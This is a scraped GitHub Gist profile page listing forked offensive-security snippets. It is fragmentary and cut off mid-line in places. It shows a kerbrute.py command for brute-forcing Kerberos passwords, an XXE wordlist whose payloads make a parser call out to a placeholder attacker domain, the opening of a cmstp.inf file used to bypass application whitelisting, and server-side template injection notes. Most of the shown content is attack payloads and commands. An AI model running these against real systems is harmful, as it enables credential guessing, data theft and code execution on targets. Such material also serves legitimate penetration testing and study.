With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>With Rubeus version with brute module:
Alessio Dalla Piazza alessiodallapiazza
🔥
alessiodallapiazza
/ xxe-payloads.txt
Created
September 14, 2020 16:46
— forked from honoki/xxe-payloads.txt
XXE bruteforce wordlist
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x SYSTEM "http://xxe-doctype-system.yourdomain[.]com/"><x /> | |
| <?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x PUBLIC "" "http://xxe-doctype-public.yourdomain[.]com/"><x /> | |
| <?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY xxe SYSTEM "http://xxe-entity-system.yourdomain[.]com/">]><x>&xxe;</x> | |
| <?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY xxe PUBLIC "" "http://xxe-entity-public.yourdomain[.]com/">]><x>&xxe;</x> | |
| <?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY % xxe SYSTEM "http://xxe-paramentity-system.yourdomain[.]com/">%xxe;]><x/> | |
| <?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY % xxe PUBLIC "" "http://xxe-paramentity-public.yourdomain[.]com/">%xxe;]><x/> | |
| <?xml version="1.0" encoding="utf-8" standalone="no" ?><x xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://xxe-xsi-schemalocation.y |
alessiodallapiazza
/ kerberos_attacks_cheatsheet.md
Created
March 22, 2020 16:36
— forked from TarlogicSecurity/kerberos_attacks_cheatsheet.md
A cheatsheet with commands that can be used to perform kerberos attacks
alessiodallapiazza
/ cmstp.inf
Created
August 3, 2018 12:35
— forked from NickTyrer/cmstp.inf
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ;cmstp.exe /s cmstp.inf | |
| [version] | |
| Signature=$chicago$ | |
| AdvancedINF=2.5 | |
| [DefaultInstall_SingleUser] | |
| UnRegisterOCXs=UnRegisterOCXSection | |
| [UnRegisterOCXSection] |
alessiodallapiazza
/ Server-Side Template Injection - RCE For the Modern WebApp by James Kettle (PortSwigger).md
Created
August 5, 2016 10:15
> Dear ${user.first_name},
Dear sample01
> Dear ${user.password}
FreeMarket template error: the following has evaluated to null or missing...Q: Is it safe to allow users to upload templates if they are untrusted?